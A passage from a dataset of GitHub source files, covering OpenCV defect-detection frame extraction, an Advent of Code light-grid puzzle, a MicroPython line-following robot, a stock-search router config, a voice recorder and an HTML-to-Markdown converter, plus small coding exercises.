Erode_Dilate(image)\n auged_img = cv2.medianBlur(image, 5)\n # 提取aug后图像的圆心\n if auged_or_org:\n circled_img, circles, tag = locate_circle(auged_img)\n else:\n circled_img, circles, tag = locate_circle(image)\n if tag != 0:\n auged_base_name = \"{}_{}.jpg\".format(video[:-4], times)\n save_im_name = os.path.join(out_dir_path, auged_base_name)\n train_im_name = os.path.join(train_frames, auged_base_name)\n # 保存提取到了圆心的图像帧, 且做画圆可视化\n cv2.imwrite(save_im_name, circled_img)\n # 提取到原因的帧, 保存未经处理的原图(后续可做一些别的aug使得训练更easy..)\n cv2.imwrite(train_im_name, image)\n if auged_base_name not in frame_circle:\n frame_circle[auged_base_name] = []\n frame_circle[auged_base_name].extend(circles.tolist())\n else:\n print('read video fail')\n break \n camera.release()\n\n\n\ndef vis_defect_box(roi_train_img_dir, roi_img_centers, box_labs):\n temp_dict = {'1':4, '2':6, '3': 4}\n ims = [os.path.join(roi_train_img_dir, a) for a in os.listdir(roi_train_img_dir)]\n for im in ims:\n center = roi_img_centers[os.path.basename(im)]\n center = [a-3 for a in center]\n img = cv2.imread(im)\n for box_lab in box_labs:\n box_center = center[0]+box_lab[1], center[1]+box_lab[2]\n # box上下左右放宽些\n p1 = [box_center[0]-box_lab[3]//2-temp_dict[str(box_lab[0])], box_center[1]-box_lab[4]//2-temp_dict[str(box_lab[0])]]\n p2 = [box_center[0]+box_lab[3]//2+temp_dict[str(box_lab[0])], box_center[1]+box_lab[4]//2+temp_dict[str(box_lab[0])]]\n cv2.rectangle(img, p1, p2, (0, 0, 255), 1, 8)\n # cv2.circle(img,(center[0],center[1]),1,(0,255,0),2)\n cv2.imwrite(im, img)\n \n\n\ndef aline_img_roi(img_centers, org_frames, roi_train_img_dir):\n for k, v in img_centers.items():\n image = cv2.imread(os.path.join(org_frames, k))\n p1, p2 = [v[0]-375, v[1]-375], [v[0]+375, v[1]+375]\n p1 = [max(0,a) for a in p1]\n p2 = [min(1280, p2[0]), min(800, p2[1])]\n # 一些物料不完整的可通过以下条件过滤掉\n if (p2[0]-p1[0]) <= 700 or (p2[1]-p1[1])<=700:\n continue\n img_roi = image[p1[1]:p2[1], p1[0]:p2[0]]\n # cv2.imshow('', img_roi)\n # cv2.waitKey(2000)\n cv2.imwrite(os.path.join(roi_train_img_dir, k), img_roi) \n\n\n\ndef circle_alin(video_path, auged_frames, org_frames, roi_train_img_dir):\n # video_path, video_name = '/Users/chenjia/Downloads/Smartmore/2022/比赛-工业表面缺陷检测/mp4s', '001.mp4'\n # auged_frames = ''\n # org_frames = ''\n # roi_train_img_dir = './roi_train_img_dir'\n\n video_paths = [os.path.join(video_path, a) for a in os.listdir(video_path)]\n #1. video拆分成frames, median_blur_aug后做霍夫圆检测. \n for video_path in video_paths:\n video_2_frams(video_path, auged_frames, org_frames, True)\n\n #2. org_frame 做模板匹配定位出小圆心.\n img_centers = get_min_apple_pattern('./pattern/train', org_frames, 'train.jpg')\n\n #3. 根据原心坐标, 对齐矫正物料圆: 其实就是扣出整个物料圆的矩形img, 物料圆的半径是375. 根据扣出的rio_img大小, 可以剔除一些定位不准的物料, 直接丢弃.\n aline_img_roi(img_centers, org_frames, roi_train_img_dir)\n\n # 重新定位roi_img的圆心\n roi_img_centers = get_min_apple_pattern('./pattern/train', roi_train_img_dir, 'train_roi.jpg')\n\n return roi_img_centers\n\n\nif __name__ == \"__main__\":\n #1. video拆分成frames, 并且做aug和霍夫圆检测. 筛选save下后续的train-image\n video_path, video_name = '/Users/chenjia/Downloads/Smartmore/2022/比赛-工业表面缺陷检测/mp4s', '001.mp4'\n auged_frames = './1'\n org_frames = './2'\n # video_2_frams(video_path, video_name, auged_frames, org_frames, True)\n \n #2. 分别用org_frame 和aug_frame做模板匹配定位出小圆心.\n # org\n # img_centers = get_min_apple_pattern('./pattern/train', org_frames)\n # with open(\"./image_centers.json\", \"w\") as f:\n # f.write(json.dumps(img_centers, indent=4))\n # print(len(img_centers))\n '''\n # auged\n img_centers = get_min_apple_pattern('./pattern_org/train', auged_frames)\n print(len(img_centers))\n 模板匹配到的图像数量都是一样额, 个人感觉是用原图好一些? [防止滤波改变图像的一些粗细度]\n '''\n\n #3. 根据原心坐标, 对齐矫正物料圆: 其实就是扣出整个物料圆的矩形img, 物料圆的半径是375\n #另外根据扣出的rio_img大小, 可以剔除一些定位不准的物料. 直接丢弃即可.\n roi_train_img_dir = './roi_train_img_dir'\n img_centers = json.load(open(\"./image_centers.json\", \"r\"))\n for k, v in img_centers.items():\n image = cv2.imread(os.path.join(org_frames, k))\n p1, p2 = [v[0]-375, v[1]-375], [v[0]+375, v[1]+375]\n p1 = [max(0,a) for a in p1]\n p2 = [min(1280, p2[0]), min(800, p2[1])]\n # 一些物料不完整的可通过以下条件过滤掉\n if (p2[0]-p1[0]) <= 700 or (p2[1]-p1[1])<=700:\n continue\n img_roi = image[p1[1]:p2[1], p1[0]:p2[0]]\n # cv2.imshow('', img_roi)\n # cv2.waitKey(2000)\n cv2.imwrite(os.path.join(roi_train_img_dir, k), img_roi) \n\n # 重新定位roi_img的圆心\n roi_img_centers = get_min_apple_pattern('./pattern/train', roi_train_img_dir, 'train_roi.jpg')\n # 画个defect可视化看看准否 \n vis_defect_box(roi_train_img_dir, roi_img_centers, [[1,93,59,7,3]])\n\n \n \n\n \n\n\n\n\n\n\n","repo_name":"jiachen0212/det_defect_gongye","sub_path":"circle_alignment.py","file_name":"circle_alignment.py","file_ext":"py","file_size_in_byte":7512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7679703340","text":"from aoc_utils import run_with_timer\n\ndata = [[y for y in x.strip()] for x in open('input.txt').readlines()]\n\n\ndef get_neighbor(lights, row, col):\n\tif 0 <= row < len(lights) and 0 <= col < len(lights[0]):\n\t\treturn lights[row][col]\n\n\ndef get_immediate_neighbors(lights, row, col):\n\treturn [\n\t\tget_neighbor(lights, row - 1, col - 1),\n\t\tget_neighbor(lights, row - 1, col),\n\t\tget_neighbor(lights, row - 1, col + 1),\n\n\t\tget_neighbor(lights, row, col + 1),\n\t\tget_neighbor(lights, row, col - 1),\n\n\t\tget_neighbor(lights, row + 1, col + 1),\n\t\tget_neighbor(lights, row + 1, col),\n\t\tget_neighbor(lights, row + 1, col - 1)\n\t]\n\n\ndef run_x_steps(lights, all_light_pos, step_count):\n\tfor i in range(step_count):\n\t\tlights_to_switch = []\n\t\tfor point in all_light_pos:\n\t\t\tneighbors = get_immediate_neighbors(lights, point[0], point[1])\n\t\t\tif lights[point[0]][point[1]] == '#' and neighbors.count('#') not in (2, 3):\n\t\t\t\tlights_to_switch.append(point)\n\t\t\telif lights[point[0]][point[1]] == '.' and neighbors.count('#') == 3:\n\t\t\t\tlights_to_switch.append(point)\n\t\tfor light in lights_to_switch:\n\t\t\tlights[light[0]][light[1]] = '.' if lights[light[0]][light[1]] == '#' else '#'\n\treturn sum(x.count('#') for x in lights)\n\n\ndef part_one():\n\tlights = [list(x) for x in data]\n\tall_light_pos = [(row, col) for row in range(len(lights)) for col in range(len(lights[row]))]\n\treturn run_x_steps(lights, all_light_pos, 100)\n\n\ndef part_two():\n\tlights = [list(x) for x in data]\n\tlights[0][0] = '#'\n\tlights[0][-1] = '#'\n\tlights[-1][0] = '#'\n\tlights[-1][-1] = '#'\n\tall_light_pos = [(row, col) for row in range(len(lights)) for col in range(len(lights[row]))]\n\tall_light_pos.remove((0, 0))\n\tall_light_pos.remove((0, len(lights[0])-1))\n\tall_light_pos.remove((len(lights)-1, 0))\n\tall_light_pos.remove((len(lights)-1, len(lights[0])-1))\n\treturn run_x_steps(lights, all_light_pos, 100)\n\n\nif __name__ == '__main__':\n\trun_with_timer(part_one) #\n\trun_with_timer(part_two) #\n","repo_name":"andrewpickett/advent-of-code","sub_path":"2015/python/day18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20258450001","text":"import time\nimport drv8835\nfrom sensor import QTRxRC\nfrom config.service_robot1 import config\n\nDUTY_ST = 300\nDUTY_MIN = 200\t\t# duty lower: 200\nROT1_MS = 5300\nROT1_DURATION = 10\n\nclass Motor(object):\n def __init__(self):\n self._drv = drv8835.DRV8835(config.drv8835_mode,\n config.A_in1, config.A_in2,\n config.B_in1, config.B_in2)\n self._a_duty = 0\n self._b_duty = 0\n\n def start(self):\n self._drv.phen_raw_a_dir(0)\n self._drv.phen_raw_b_dir(0)\n\n def duty(self, a_duty, b_duty):\n self._a_duty = a_duty\n self._b_duty = b_duty\n self._drv.phen_raw_a_duty(self._a_duty)\n self._drv.phen_raw_b_duty(self._b_duty)\n\n def straight(self):\n self.duty(DUTY_ST, DUTY_ST)\n\n def turn_L(self, r_plus):\n self.duty(DUTY_MIN, DUTY_MIN+r_plus)\n\n def turn_R(self, l_plus):\n self.duty(DUTY_MIN+l_plus, DUTY_MIN)\n\n def stop(self):\n self._drv.phen_raw_a_duty(0)\n self._drv.phen_raw_b_duty(0)\n self._drv.phen_raw_a_dir(0)\n self._drv.phen_raw_b_dir(0)\n\n def _rotate(self, a_dir, b_dir, duration_ms):\n self.stop()\n self._drv.phen_raw_a_dir(a_dir)\n self._drv.phen_raw_b_dir(b_dir)\n self.duty(DUTY_MIN, DUTY_MIN)\n time.sleep_ms(duration_ms)\n self.stop()\n\n def rotate_L(self, duration_ms):\n self._rotate(0, 1, duration_ms)\t\t# 1cycle/5.3sec\n\n def rotate_R(self, duration_ms):\n self._rotate(1, 0, duration_ms)\n\nINIT = 0\nGSEARCH = 1\nSHIFT_R = 2\nSHIFT_R2 = 3\nROTATE_R = 4\nONLINE_FROM_R = 5\nONLINE_CONT = 6\nONLINE_FROM_L = 7\nROTATE_L = 8\nSHIFT_L2 = 9\nSHIFT_L = 10\n\nFSM = {\n # 00 01 10 11\n INIT: (GSEARCH, SHIFT_R, SHIFT_L, ONLINE_CONT),\n GSEARCH: (GSEARCH, ROTATE_R, ROTATE_L, ONLINE_CONT),\n #\n SHIFT_R: (SHIFT_R2, SHIFT_R, SHIFT_L, ONLINE_FROM_L),\n SHIFT_R2: (ROTATE_R, SHIFT_R, SHIFT_L, ONLINE_FROM_L),\n ROTATE_R: (GSEARCH, SHIFT_R, SHIFT_L, ONLINE_FROM_L),\n ONLINE_FROM_L: (SHIFT_L, SHIFT_R, SHIFT_L, ONLINE_CONT),\n ONLINE_CONT: (SHIFT_R, SHIFT_R, SHIFT_L, ONLINE_CONT),\n ONLINE_FROM_R: (SHIFT_R, SHIFT_R, SHIFT_L, ONLINE_CONT),\n ROTATE_L: (GSEARCH, SHIFT_R, SHIFT_L, ONLINE_FROM_R),\n SHIFT_L2: (ROTATE_L, SHIFT_R, SHIFT_L, ONLINE_FROM_R),\n SHIFT_L: (SHIFT_L2, SHIFT_R, SHIFT_L, ONLINE_FROM_R),\n}\n\nclass Car(object):\n\n def __init__(self):\n self.act = {\n INIT: None,\n GSEARCH: self.search,\n SHIFT_R: self.shift_r,\n SHIFT_R2: self.shift_r2,\n ROTATE_R: self.rotate_r,\n ONLINE_FROM_L: self.online_from_l,\n ONLINE_CONT: self.online_cont,\n ONLINE_FROM_R: self.online_from_r,\n ROTATE_L: self.rotate_l,\n SHIFT_L2: self.shift_l2,\n SHIFT_L: self.shift_l,\n }\n\n self._motor = Motor()\n self._qtr = QTRxRC()\n self._qtr.add_sensor(27, 20, 40, 35)\t# mid -> right\n self._qtr.add_sensor(26, 20, 40, 35)\t# left\n\n def sens(self):\n v = 0\n for bit_pos, bval in enumerate(self._qtr.sense_black()):\n v |= (int(bval) << bit_pos)\n # left<<1, mid(right)<<0\n return v\n\n def trace(self):\n sens_str = {0b00:'__', 0b01:'_B', 0b10:'B_', 0b11:'BB'}\n state_str = {INIT:'INIT', GSEARCH:'GSEARCH', SHIFT_R:'SHIFT_R', SHIFT_R2:'SHIFT_R2',\n ROTATE_R:'ROTATE_R', ONLINE_FROM_L:'ONLINE_FROM_L', ONLINE_CONT:'ONLINE_CONT',\n ONLINE_FROM_R:'ONLINE_FROM_R', ROTATE_L:'ROTATE_L', SHIFT_L2:'SHIFT_L2',\n SHIFT_L:'SHIFT_L'}\n self._motor.start()\n cur_state = INIT\n while True:\n sens = self.sens()\n new_state = FSM[cur_state][sens]\n print(state_str[cur_state], sens_str[sens], '->', state_str[new_state])\n action = self.act.get(new_state)\n if action:\n action()\n cur_state = new_state\n time.sleep_ms(20)\n self._motor.stop()\n\n def search(self):\n self._motor.turn_L(100)\n\n def shift_r(self):\n self._motor.turn_R(30)\n\n def shift_r2(self):\n self._motor.turn_R(50)\n\n def rotate_r(self):\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_R(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b11:\n return\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_R(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b01 or sens == 0b10:\n return\n\n def online_from_l(self):\n self._motor.turn_L(1)\n\n def online_cont(self):\n self._motor.straight()\n\n def online_from_r(self):\n self._motor.turn_R(1)\n\n def rotate_l(self):\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_L(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b11:\n return\n for _ in range(ROT1_MS//ROT1_DURATION):\n self._motor.rotate_L(ROT1_DURATION)\n sens = self.sens()\n if sens == 0b01 or sens == 0b10:\n return\n\n def shift_l2(self):\n self._motor.turn_L(50)\n\n def shift_l(self):\n self._motor.turn_L(30)\n\ncar = Car()\nmotor = car._motor\ncar.trace()\n","repo_name":"ccldaout/esp32","sub_path":"upy/test/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2765210692","text":"# -*- coding: utf-8 -*-\n\nfrom mongoengine import *\nfrom collections import OrderedDict\n\nautocmp = OrderedDict({\n # key, search path, end node\n 'AllIdAutoCmp': ('routers/table/AllIdAutoCmp.yaml', {\n 'twse': ([0],),\n 'otc': ([1],)\n })\n})\n\n# register your strategies here\nrouters = OrderedDict({\n # key, search path, init node, middle node, end node\n 'StockProfileRaw': ('routers/table/StockProfileRaw.yaml', {\n 'twse': ([0,1,2], [3], [4]),\n 'otc': ([5,6,7], [8], [9])\n }),\n 'TraderProfileRaw': ('routers/table/TraderProfileRaw.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'StockProfileUp0': ('routers/table/StockProfileUp0.yaml', {\n 'twse': ([0,1,2], [3], [4]),\n 'otc': ([5,6,7], [8], [9])\n }),\n 'StockProfileDown0': ('routers/table/StockProfileDown0.yaml', {\n 'twse': ([0,1,2], [3], [4]),\n 'otc': ([5,6,7], [8], [9])\n }),\n 'StockProfileUp1': ('routers/table/StockProfileUp1.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'StockProfileDown1': ('routers/table/StockProfileDown1.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'StockProfileUp2': ('routers/table/StockProfileUp2.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'StockProfileDown2': ('routers/table/StockProfileDown2.yaml', {\n 'twse': ([0], [1,2,3], [4]),\n 'otc': ([5], [6,7,8], [9])\n }),\n 'TraderProfileUp0': ('routers/table/TraderProfileUp0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderProfileDown0': ('routers/table/TraderProfileDown0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup0': ('routers/table/TraderGroup0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup1': ('routers/table/TraderGroup1.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup2': ('routers/table/TraderGroup2.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup3': ('routers/table/TraderGroup3.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'TraderGroup4': ('routers/table/TraderGroup4.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'StockGroup0': ('routers/table/StockGroup0.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n }),\n 'StockGroup1': ('routers/table/StockGroup1.yaml', {\n 'twse': ([0], [], [1]),\n 'otc': ([2], [], [3])\n })\n})\n\nALG_CHOICES = [(i, k) for i, k in enumerate(sorted(routers.keys()))]\n\nOPT_CHOICES = (\n (0, 'twse'),\n (1, 'otc')\n)\n\nclass SearchItem(Document):\n starttime = StringField(required=True, max_length=10, help_text='starttime:2015/01/01')\n endtime = StringField(required=True, max_length=10, help_text='endtime:2015/01/30')\n stockids = StringField(max_length=40, help_text='stockids:2330,2317')\n traderids = StringField(max_length=40, help_text='traderids:1440,1470')\n opt = StringField(required=True, max_length=5, choices=OPT_CHOICES, help_text='opt:twse|otc')\n algorithm = StringField(required=True, max_length=70, choices=ALG_CHOICES, help_text='algorithm')","repo_name":"funningboy/scrapy_giant","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"11471581207","text":"def sum_mul(n, m):\n if n <= 0 or m <= 0:\n return(\"INVALID\")\n else:\n sum = 0\n for i in range(n, m):\n if i % n == 0:\n sum += i\n return(sum)\n\n\n# Best Practices\ndef sum_mul(n, m):\n if m>0 and n>0:\n return sum(range(n, m, n))\n else:\n return 'INVALID'\n","repo_name":"walkgo/codewars_tasks","sub_path":"8kyu/Sum of Multiples.py","file_name":"Sum of Multiples.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42318879070","text":"from collections import deque\n\nneed = input()\nn = int(input())\n\nfor k in range(1, n + 1):\n d = input()\n queue = deque(need)\n\n for i in range(len(d)):\n if d[i] in queue:\n if d[i] == queue.popleft():\n continue\n else:\n print(\"#%d NO\" % k)\n break\n else:\n if queue:\n print(\"#%d NO\" % k)\n else:\n print(\"#%d YES\" % k)","repo_name":"castle-joooun/algorithm_python","sub_path":"inflearn/algorithm/5/5-7_solv.py","file_name":"5-7_solv.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71014965866","text":"def Myfun(name,age):\n print(name,age)\n\nMyfun(\"Shivani\",21) \n\ndef func1(*arguments):\n for i in arguments:\n print(i)\n\nfunc1(20,40,60)\nprint() \nfunc1(80,100) \n\ndef calculation(a,b):\n addition = a+b\n subtraction = a-b\n return addition,subtraction\n\nprint(\"Return both addition and subtraction in a single return call\")\nfinal = calculation(40,10)\nprint(final)\n\ndef show_employee(name,salary=9000):\n print(name,salary)\n \nshow_employee(\"Ben\",12000) \nshow_employee(\"Jessa\") \n\ndef recursive_fun(numbers):\n if numbers:\n return numbers + recursive_fun(numbers-1)\n else:\n return 0\n \nobj = recursive_fun(10)\nprint(obj) \n\ndef func1(number1,number2):\n list = []\n for i in range(number1,number2,2):\n list.append(i)\n print(list)\n \nfunc1(4,30) \n \ndef display_student(name,age):\n print(name,age)\n \ndisplay_student(\"Emma\",26)\nshow_student = display_student\nshow_student(\"Emma\",26) \n\ndef larger(List):\n max = List[0]\n for i in List:\n if i > max:\n max = i \n print(f\"largest number of the List : {max}\") \n\nList = [4,6,8,24,12,2] \nlarger(List) \n\ndef outer_fun(a,b):\n def inner_fun(a,b):\n return a+b\n addition = inner_fun(a,b)\n return addition+5\n\nfinal = outer_fun(5,10)\nprint(final)","repo_name":"Shivanik2002/Exercise_for_basic_quiz","sub_path":"function_concept.py","file_name":"function_concept.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41388755240","text":"\"\"\"Module used to record the user voice.\"\"\"\nimport wave\nimport struct\nimport math\nimport time\nimport sys\nimport os\nimport dataclasses\nimport pyaudio\n\nfrom app.config.recorder import RECORDER\n\n@dataclasses.dataclass\nclass VoiceRecorderConfig:\n \"\"\"Class used to store the voice recorder configuration.\"\"\"\n rms_threshold: int\n chunk: int\n channels: int\n format: int\n rate: int\n timeout_length: int\n records_directory: str\n\nclass VoiceRecorder:\n \"\"\"Class used to record the user voice.\"\"\"\n @staticmethod\n def rms(frame):\n \"\"\"Returns the root mean square of the frame.\"\"\"\n count = len(frame) / RECORDER['SWIDTH']\n sformat = f'{int(count)}h'\n shorts = struct.unpack(sformat, frame)\n sum_squares = 0.0\n for sample in shorts:\n n_samples = sample * RECORDER['SHORT_NORMALIZE']\n sum_squares += n_samples * n_samples\n rms = math.pow(sum_squares / count, 0.5)\n return rms * 1000\n\n def __init__(self):\n self._config = VoiceRecorderConfig(\n rms_threshold = RECORDER['RMS_THRESHOLD'],\n chunk = RECORDER['CHUNK'],\n channels = RECORDER['CHANNELS'],\n format = RECORDER['FORMAT'],\n rate = RECORDER['RATE'],\n timeout_length = RECORDER['TIMEOUT_LENGTH'],\n records_directory = RECORDER['DIRECTORY'],\n )\n\n self._p = pyaudio.PyAudio()\n self._stream = self._p.open(\n format=self._config.format,\n frames_per_buffer=self._config.chunk,\n channels=self._config.channels,\n rate=self._config.rate,\n input=RECORDER['INPUT'],\n )\n\n def save(self, audio):\n \"\"\"Save the audio into a wav file.\"\"\"\n # Create records directory if not exists\n if not os.path.isdir(self._config.records_directory):\n os.mkdir(self._config.records_directory)\n\n # Get dynamic filename\n now = time.strftime('%Y-%m-%d-%H-%M-%S')\n n_files = len(os.listdir(self._config.records_directory))\n filename = os.path.join(self._config.records_directory, f'{n_files}-{now}.wav')\n\n # Format audio with good parameters\n w_file = wave.open(filename, 'wb')\n w_file.setnchannels(self._config.channels)\n w_file.setsampwidth(self._p.get_sample_size(self._config.format))\n w_file.setframerate(self._config.rate)\n w_file.writeframes(audio)\n w_file.close()\n\n print(f'📁 Record saved at {filename}')\n return filename\n\n def record(self):\n \"\"\"Record the user voice when he talk, then save it and return the path.\"\"\"\n print('🎤 Voice detected !')\n\n audio = []\n now = time.time()\n end = time.time() + self._config.timeout_length\n\n while now <= end:\n # Reset timer if the voice is talking\n data = self._stream.read(self._config.chunk)\n if self.rms(data) >= self._config.rms_threshold:\n end = time.time() + self._config.timeout_length\n\n now = time.time()\n audio.append(data)\n\n audio_path = self.save(b''.join(audio))\n return audio_path\n\n def listen(self):\n \"\"\"Loop that listens the user in real time and record the voice when detected.\"\"\"\n print('👂 Ready to listen')\n while True:\n sinput = self._stream.read(self._config.chunk)\n rms_value = self.rms(sinput)\n if rms_value > self._config.rms_threshold:\n sys.stdout.flush()\n audio = self.record()\n return audio\n","repo_name":"TheoBIET/ava.py","sub_path":"app/classes/voice_recorder.py","file_name":"voice_recorder.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36259524951","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 27 18:47:06 2018\n\n@author: prime\n\"\"\"\n\ndef isValidWord(word, hand, wordList):\n \"\"\"\n Returns True if word is in the wordList and is entirely\n composed of letters in the hand. Otherwise, returns False.\n\n Does not mutate hand or wordList.\n \n word: string\n hand: dictionary (string -> int)\n wordList: list of lowercase strings\n \"\"\"\n # TO DO ... <-- Remove this comment when you code this function\n letters = [letter for letter in hand.keys() for frequency in range(hand[letter])]\n\n # Check for validity of word in wordList\n if word not in wordList:\n return False\n # Remove letters from word one by one from list\n else:\n for letter in word:\n if letter in letters:\n letters.remove(letter)\n else:\n return False\n return True","repo_name":"pnijhara/python-practice","sub_path":"mit6.00.1x official/week_4_Good_Programming_Practices/ \tProblem_Set_4/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22073686371","text":"#--------------------------\n# HTML to MD\n# Author: rey.olivier@gmail.com\n# License: GPL v3\n#--------------------------\nimport re\n\nfrom html.parser import HTMLParser\n\nDO_NOTHING_BEGIN = [\"HTML\", \"HEAD\", \"META\", \"STYLE\", \"BODY\", \"FONT\", \"P\",\n \"COL\", \"TR\", \"TD\"]\n\nDO_NOTHING_END = [\"HTML\", \"HEAD\", \"META\", \"STYLE\", \"BODY\", \"FONT\",\n \"COL\", \"TR\", \"TD\", \"BR\"]\n\nREMOVE_CONTENT = [\"STYLE\", \"COL\", \"TR\", \"TD\"]\n\n\nBLANK_LINE = [\"TITLE\", \"H1\", \"H2\", \"H3\", \"H4\", \"H5\", \"P\"]\n\n\nclass MyHTMLParser(HTMLParser):\n out = None\n currenttag = \"\"\n \n tablenb = 0\n intable = False\n\n verbose = False\n imagelog = open(\"imagelog.txt\", \"w\")\n\n inlink = False\n datalink = \"\"\n url = \"\"\n\n def setOutputFile(self, out, verbose=False):\n self.out = out\n self.verbose = verbose\n \n \n def handle_starttag(self, tag, attrs):\n if (self.verbose):\n print(\"Encountered a start tag:\", tag)\n thetag = tag.upper()\n self.currenttag = thetag\n if (thetag in DO_NOTHING_BEGIN):\n if (self.verbose):\n print(\"Doing nothing\")\n return\n if (thetag == \"TITLE\"):\n self.out.write(\"# \")\n return\n if (thetag == \"H1\"):\n self.out.write(\"## \")\n return\n if (thetag == \"H2\"):\n self.out.write(\"### \")\n return\n if (thetag == \"H3\"):\n self.out.write(\"#### \")\n return\n if (thetag == \"H4\"):\n self.out.write(\"##### \")\n return\n if (thetag == \"H5\"):\n self.out.write(\"###### \")\n return\n if (thetag == \"A\"):\n if (self.intable):\n return\n else:\n self.inlink = True\n # getting href value\n self.url = attrs[0][1]\n # print(\"entering a, url = \" + self.url)\n return\n if (thetag == \"BR\"):\n if (self.intable):\n return\n else:\n self.out.write(\"\\n\\n\")\n return\n if (thetag == \"B\"):\n if (self.intable):\n return\n else:\n self.out.write(\"**\")\n return\n if (thetag == \"TABLE\"):\n # protecting table from other tags\n self.out.write(\"\\n\\n\")\n self.tablenb += 1\n self.intable = True\n return\n if (self.verbose):\n print(\"No treatment for tag: \" + tag)\n \n\n def handle_endtag(self, tag):\n if (self.verbose):\n print(\"Encountered an end tag :\", tag)\n thetag = tag.upper()\n if (thetag in DO_NOTHING_END):\n if (self.verbose):\n print(\"Doing nothing\")\n return\n if (thetag in BLANK_LINE):\n self.out.write(\"\\n\\n\")\n return\n if (thetag == \"B\"):\n if (self.intable):\n return\n else:\n self.out.write(\"** \")\n return\n if (thetag == \"A\"):\n self.out.write(\" [\" + self.datalink + \"](\" + self.url + \") \")\n self.inlink = False\n #print(\"exiting a\")\n return\n if (thetag == \"P\"):\n if (self.ntable):\n return\n else:\n self.out.write(\"\\n\\n\")\n return\n if (thetag == \"TABLE\"):\n imagename = self.out.name.split('.')[0] \\\n + '-Table' + str(self.tablenb).zfill(2) + \".png\"\n self.out.write(\"![\" + imagename + \"](\" + imagename + \")\\n\\n\")\n self.intable = False\n self.imagelog.write(imagename + \"\\n\")\n return\n if (self.verbose):\n print(\"No treatment for tag: \" + tag)\n\n \n def handle_data(self, data):\n #print(\"Encountered some data :\", data)\n if (self.intable):\n return\n if (self.inlink):\n #print(\"adding data: \" + removeBlanks(data))\n self.datalink += removeBlanks(data)\n return\n if (not (self.currenttag in REMOVE_CONTENT)):\n self.out.write(removeBlanks(data))\n\n\n'''\nclass Table:\n # row numbers start at 0\n rows = [][]\n def addCell(self, rownumber, value):\n self.rows[rownumber].append(value)\n def serialize(self):\n output = \"\"\n # first row determines the number of columns\n nbcol = len(rows[0])\n nbrows = len(rows)\n print(\" The table has \" + str(nbcol + \" columns and \" + str(nbroxs) + \" rows.\")\n # writing header\n for (value in rows[0]):\n output += \"| \" + value + \" \"\n output += \" |\\n\"\n # writing separator\n for (i in range(0, nbcol)):\n output += \"| --- \"\n output += \" |\\n\"\n # some lines may not have the right amount of columns\n for (i in range(1,nbrows)):\n therow = row[i]\n if (len(therow) < nbcol):\n print(\"Error\")\n print(therow)\n break;\n'''\n \n\n#--------------------------------\n# Utilities\n#--------------------------------\n \ndef removeBlanks(s):\n # removing Windows CR/LF\n ns = s.replace(\"\\r\\n\", \" \")\n # removing Unix LF\n ns = ns.replace(\"\\n\", \" \")\n # stripping white spaces left and right\n ns = ns.strip()\n return re.sub(' +', ' ', ns)\n\n\n#--------------------------------\n# A little brutal - did not have time to package it in a shell\n#--------------------------------\n\nFILES = [\n \"00 Legal.html\",\n \"01 Basics.html\",\n \"02 Description.html\",\n \"03 Races.html\",\n \"04 ClassesI.html\",\n \"05 ClassesII.html\",\n \"06 SkillsI.html\",\n \"07 SkillsII.html\",\n \"08 Feats.html\",\n \"09 Equipment.html\",\n \"10 SpecialMaterials.html\",\n \"11 CombatI.html\",\n \"12 CombatII.html\",\n \"13 AbilitiesandConditions.html\",\n \"14 NPCClasses.html\",\n \"15 PrestigeClasses.html\",\n \"16 MagicOverview.html\",\n \"17 SpellListI.html\",\n \"18 SpellListII.html\",\n \"19 SpellsA-B.html\",\n \"20 SpellsC.html\",\n \"21 SpellsD-E.html\",\n \"22 SpellsF-G.html\",\n \"23 SpellsH-L.html\",\n 